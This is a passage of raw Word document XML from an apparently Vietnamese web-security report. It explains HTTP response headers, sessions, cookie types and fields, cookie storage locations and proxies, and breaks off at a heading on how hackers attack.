                              <w:spacing w:before="128"/>
                              <w:ind w:left="106"/>
                              <w:rPr>
                                <w:rFonts w:asci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69185" id="Text Box 6" o:spid="_x0000_s1095" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63.65pt;margin-top:22.3pt;width:431.2pt;height:269.8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" filled="f" strokeweight=".48pt">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5FFC8F9B" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                      <w:pPr>
                        <w:spacing w:before="29"/>
                        <w:ind w:left="106"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>HTTP/1.1 200 OK</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="771E2976" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                      <w:pPr>
                        <w:spacing w:before="130"/>
                        <w:ind w:left="106"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>Server: Microsoft-IIS/5.0</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5B29933E" w14:textId="27F6C5AA" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                      <w:pPr>
                        <w:spacing w:before="128"/>
                        <w:ind w:left="106"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>Date: Thu, 13 Jul 2000 05:46:53 GMT</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4109D04B" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                      <w:pPr>
                        <w:spacing w:before="128"/>
                        <w:ind w:left="106"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="395C60B5" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                      <w:pPr>
                        <w:spacing w:before="128"/>
                        <w:ind w:left="106"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="3D32F385" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                      <w:pPr>
                        <w:spacing w:before="29" w:line="369" w:lineRule="auto"/>
                        <w:ind w:left="106" w:right="5530"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>Content-Length: 2291 Content-Type:</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:spacing w:val="52"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>text/html</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="66B51BF7" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                      <w:pPr>
                        <w:ind w:left="106"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>Set-Cookie:</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:spacing w:val="67"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>ASPSESSIONIDQQGGGNCG=LKLDFFKCINFLDMFHCBCBMFLJ;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4CFECD17" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                      <w:pPr>
                        <w:spacing w:before="127"/>
                        <w:ind w:left="106"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>path=/</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="660EB695" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                      <w:pPr>
                        <w:spacing w:before="130"/>
                        <w:ind w:left="106"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>Cache-control: private</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5D7F5A0E" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="79AEA273" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                        <w:spacing w:before="8"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="19"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="3B9B0E0A" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                      <w:pPr>
                        <w:ind w:left="106"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>&lt;HTML&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="46765DA4" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                      <w:pPr>
                        <w:spacing w:before="127"/>
                        <w:ind w:left="106"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>&lt;BODY&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="45F32569" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                      <w:pPr>
                        <w:spacing w:before="130"/>
                        <w:ind w:left="106"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>...</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="046F4EE9" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                      <w:pPr>
                        <w:spacing w:before="128"/>
                        <w:ind w:left="106"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="0096149B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Header trả lời</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A841D7" w14:textId="77777777" w:rsidR="0096149B" w:rsidRDefault="002F0CA8" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>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Dòng đầu là dòng trạng thái, để cho biết phiên bản HTTP được dùng</w:t>
      </w:r>
      <w:r w:rsidR="0096149B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0096149B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(HTTP/1.1), mã trạng thái (200) và trạng thái (OK).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1765B703" w14:textId="77777777" w:rsidR="0096149B" w:rsidRDefault="0096149B" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F0CA8" w:rsidRPr="002F0CA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tiếp theo là các tham số.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE3AE95" w14:textId="1A966967" w:rsidR="002F0CA8" w:rsidRPr="0096149B" w:rsidRDefault="0096149B" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F0CA8" w:rsidRPr="002F0CA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tiếp theo là một dòng trống để báo hiệu kết thúc header, tiếp theo là phần thân của HTTP response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164BEBF4" w14:textId="312BFFB9"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5" w:name="_Toc59634009"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Khái niệm Session</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="0A7933A6" w14:textId="72FEA6F7"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HTTP là giao thức hướng đối tượng tổng quát, phi trạng thái, nghĩa là HTTP không  lưu trữ trạng thái làm việc giữa trình duyệt với trình chủ. Sự thiếu sót này gây khó khăn cho một số ứng dụng Web, bởi vì trình chủ không biết được  trước  đó trình  duyệt đã có những trạng thái nào. Vì thế, để giải quyết vấn đề này, ứng dụng Web   đưa ra một khái niệm phiên làm việc (Session). Còn SessionID là một chuỗi để chứng thực phiên làm việc. Một số trình chủ   sẽ cung cấp một SessionID cho người dùng   khi họ xem trang web trên trình chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282438B4" w14:textId="566CC720" w:rsidR="0096149B"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Để duy trì phiên làm việc thì sessionID thường được lưu vào :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0DC78A"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Biến trên URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAA4312"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Biến ẩn form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5811A9B4" w14:textId="4EA2F64C" w:rsidR="002F0CA8" w:rsidRP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Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292204FA" w14:textId="10D327F7"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lastRenderedPageBreak/>
        <w:t>Phiên làm việc chỉ tồn tại trong một khoảng thời gian cho phép, thời gian này được  cấu hình qui định tại trình chủ hoặc bởi ứng dụng thực thi. Trình chủ sẽ tự động giải phóng phiên làm việc để khôi phục lại tài nguyên của hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD27278" w14:textId="29E39133"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6" w:name="_Toc59634010"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Khái niệm Cookie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="643EA8B6" w14:textId="760D38D1"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Cookie là những phần dữ liệu nhỏ có cấu trúc được chia sẻ giữa trình chủ và trình duyệt của người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410DE055" w14:textId="01EA1418"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Các cookie được lưu trữ dưới những file dữ liệu nhỏ dạng text, được ứng dụng tạo ra để lưu trữ/truy tìm/nhận biết các thông tin về người dùng đã ghé thăm trang Web và những vùng mà họ đi qua trong trang. Những thông tin này có thể bao gồm tên/định danh người dùng, mật khẩu, sở thích, thói quen...cookie được trình duyệt của người dùng chấp nhận lưu trên đĩa cứng của máy mình, tuy nhiên không phải lúc nào trình duyệt cũng hỗ trợ cookie, mà còn tùy thuộc vào người dùng có chấp nhận chuyện lưu trữ đó hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F3CBE2" w14:textId="4A862538"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Ở những lần truy cập sau đến trang Web đó, ứng dụng có thể  dùng lại những thông  tin trong cookie (như thông tin liên quan đến việc đăng nhập vào Yahoo  Messenger!...) mà người dùng không phải làm lại thao tác đăng nhập hay phải cung cấp lại các thông tin khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478E3B51" w14:textId="35AC4E5F" w:rsidR="0096149B" w:rsidRPr="005E1B43"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Cookie được phân làm 2 loại secure/non-secure và persistent/non-persistent do đó ta  sẽ có 4 kiểu cookie là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3D0701"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Persistent và Secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406A6BB4"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Persistent và Non-Secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CA1531"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Non-Persistent và Secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104CB269" w14:textId="6528B826" w:rsidR="002F0CA8" w:rsidRP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Non-Persistent và Non-Secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6801CA02" w14:textId="322C2287"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Persistent cookies được lưu trữ dưới dạng tập tin .txt (ví dụ trình duyệt Netscape Navigator sẽ lưu các cookie thành một tập tin cookie.txt còn Internet Explorer sẽ lưu thành nhiều tập tin *.txt trong đó mỗi tập tin là một cookie) trên máy khách trong một khoản thời gian xác định.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1613BD76" w14:textId="0DB9D495"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Non-persistent cookie thì được lưu trữ trên bộ nhớ RAM của máy khách và sẽ bị hủy khi đóng trang web hay nhận được lệnh hủy từ trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6A0C64" w14:textId="12F6DD0A"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Secure cookies chỉ có thể được gửi thông qua HTTPS (SSL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3127FC7E" w14:textId="742C22A2"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lastRenderedPageBreak/>
        <w:t>Non-Secure cookie có thể được gửi bằng cả hai giao thức HTTPS hay HTTP. Thực chất là đối với secure cookie thì trình chủ sẽ cung cấp chế độ truyền bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD1AFB1" w14:textId="0507A9AE" w:rsidR="002F0CA8" w:rsidRPr="0096149B" w:rsidRDefault="002F0CA8" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Các thành phần của một cookie gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0049821F" w14:textId="77777777" w:rsidR="0096149B" w:rsidRDefault="002F0CA8" w:rsidP="00E42092">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0CA8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72FFA3C0" wp14:editId="79F3D70B">
            <wp:extent cx="5943600" cy="8712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9564" cy="873608"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4392D2D1"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 xml:space="preserve">Domain: Tên miền của trang web đã tạo cookie ( trong ví dụ trên là </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="0096149B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>www.redhat.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0096149B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F895B66" w14:textId="77777777" w:rsid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Flag: mang giá trị TRUE/FALSE -Xác định các máy khác với cùng tên miền có</w:t>
      </w:r>
      <w:r w:rsidR="0096149B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0096149B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>được truy xuất đến cookie hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D6305C" w14:textId="5B448AB0" w:rsidR="002F0CA8" w:rsidRPr="0096149B" w:rsidRDefault="002F0CA8" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>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Path: Phạm vi các địa chỉ có thể truy xuất cookie. Ví dụ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210A191C" w14:textId="3C19CD58" w:rsidR="002F0CA8" w:rsidRPr="0096149B"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Nếu path là “/tracuu” thì các địa chỉ trong thư mục /tracuu cũng như tất cả các thư mục con của nó như /tracuu/baomat có thể truy xuất đến cookie này. Còn nếu giá tri là “/” thì cookie sẽ được truy xuất bởi tất cả địa chỉ thuộc miền trang web tạo cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B71F8ED" w14:textId="15C97568" w:rsidR="002F0CA8" w:rsidRPr="0096149B"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Sercure: mang giá trị TRUE/FALSE - Xác định đây là một secure cookie hay khôn</w:t>
      </w:r>
      <w:r w:rsidR="0096149B" w:rsidRPr="0096149B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">g </w:t>
      </w:r>
      <w:r w:rsidRPr="0096149B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nghĩa là kết nối có sử dụng SSL hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6766F3" w14:textId="7E5C49ED" w:rsidR="002F0CA8" w:rsidRPr="0096149B"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Expiration: thời gian hết hạn của cookie, được tính bằng giây kể từ 00:00:00 giờ GMT ngày 01/01/1970. Nếu giá trị này không được thiết lập thì trình duyệt sẽ   hiểu đây là non-persistent cookie và chỉ lưu trong bộ nhớ RAM và sẽ xoá nó khi trình duyệt bị đóng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE563B9" w14:textId="4CC2FCF1" w:rsidR="002F0CA8" w:rsidRPr="0096149B"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Name: Tên biến (trong trường hợp này là Apache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038D207B" w14:textId="545D6187" w:rsidR="002F0CA8" w:rsidRPr="00E42092"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96149B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Value: Với cookie được tạo ở trên thì giá trị của Apache là 64.3.40.151.16018996349247480 và ngày hết hạn là 27/07/2006, của tên miền http://www.redhat.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604C44E8" w14:textId="27BE3269" w:rsidR="002F0CA8" w:rsidRPr="00017D29" w:rsidRDefault="00017D29"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88C0660" wp14:editId="1A8DC6D2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>302706</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5504815" cy="7620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815" cy="762000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="002F0CA8" w:rsidRPr="00017D29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ví dụ chuỗi lệnh trong HTTP header dưới đây sẽ tạo một cookie:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B08F04F" w14:textId="0A834808" w:rsidR="002F0CA8" w:rsidRDefault="002F0CA8" w:rsidP="00E42092">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="965"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F423CE1" w14:textId="1D63BE39" w:rsidR="00017D29" w:rsidRPr="00017D29"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lastRenderedPageBreak/>
        <w:t>Các cookie của Netscape (NS) đặt trong một tập tin Cookies.txt, với đường dẫn    là: C:\Program Files\Netscape\Users\UserName\Cookies.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A2EDE0" w14:textId="1AE97BB1" w:rsidR="002F0CA8" w:rsidRPr="00017D29"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2F0CA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Các cookies của IE được lưu thành nhiều tập tin, mỗi tập tin là một  cookie và  được đặt trong [C:]\Documents and Setting\[username]\Cookies (Win2000), đối với win9x, thư mục cookies nằm trong thư mục [C:]\Windows\cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24804BEF" w14:textId="3F00A465" w:rsidR="002F0CA8" w:rsidRPr="00017D29" w:rsidRDefault="002F0CA8" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="965"/>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 xml:space="preserve">Kích thước tối đa của cookie là 4kb. Số cookie tối đa cho một tên miền là 20 cookie. Cookie bị hủy ngay khi đóng trình duyệt gọi là “session cookie”. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBD3210" w14:textId="42D75BDD" w:rsidR="00407983" w:rsidRDefault="0040798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7" w:name="_Toc59634011"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Khái niệm Proxy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="0C4C16F9" w14:textId="78407056" w:rsidR="002F0CA8" w:rsidRPr="00E42092" w:rsidRDefault="002F0CA8"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Proxy cung cấp cho người sử dụng truy xuất Internet những nghi thức đặt biệt hoặc một tập những nghi thức thực thi trên dual_homed host hoặc basion host. Những chương trình client của người sử dụng sẽ qua trung gian proxy server thay thế cho server thật sự mà người sử dụng cần giao tiếp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEC161C" w14:textId="03315E6B" w:rsidR="002F0CA8" w:rsidRPr="00017D29" w:rsidRDefault="002F0CA8"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Proxy server xác định những yêu cầu từ client và quyết định đáp ứng hay không đáp ứng, nếu yêu cầu được đáp ứng, proxy server sẽ kết nối với server thật thay cho client và tiếp tục chuyển tiếp những yêu cầu từ client đến server, cũng như   trả lời của   server đến client. Vì vậy proxy server giống cầu nối trung gian giữa server và client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C6BD02" w14:textId="322D93F6" w:rsidR="00903C21" w:rsidRDefault="00903C21" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc59634012"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Quá trình tấn công của hacker</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="434DE080" w14:textId="0A96ECBE" w:rsidR="00903C21" w:rsidRDefault="00903C21" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
